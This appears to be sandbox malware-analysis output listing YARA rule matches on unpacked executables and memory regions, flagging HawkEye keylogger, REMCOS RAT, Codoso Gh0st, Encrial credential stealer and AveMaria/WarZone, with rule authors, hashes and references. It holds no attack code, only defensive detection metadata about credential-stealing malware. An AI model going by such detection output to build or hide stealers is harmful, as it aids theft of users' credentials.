                    Source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.2.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.0.rem9090sta.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.48e7e0d.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.48e7e0d.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.4ab0000.13.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4ab0000.13.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.4ab0000.13.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 3.3.bin.exe.d4d388.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 3.3.bin.exe.d4d388.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 40.2.5.exe.3759660.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.3759660.7.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.3759660.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.48aec92.9.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.48aec92.9.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.2.Windows Update.exe.4ab0000.13.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4ab0000.13.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.4ab0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.0.Windows Update.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 18.2.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 0000002C.00000002.921284802.0000000007700000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000003.00000002.929833680.000000000021F000.00000002.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001D.00000000.726336718.000000000021F000.00000002.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 0000001D.00000002.730907039.000000000021F000.00000002.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
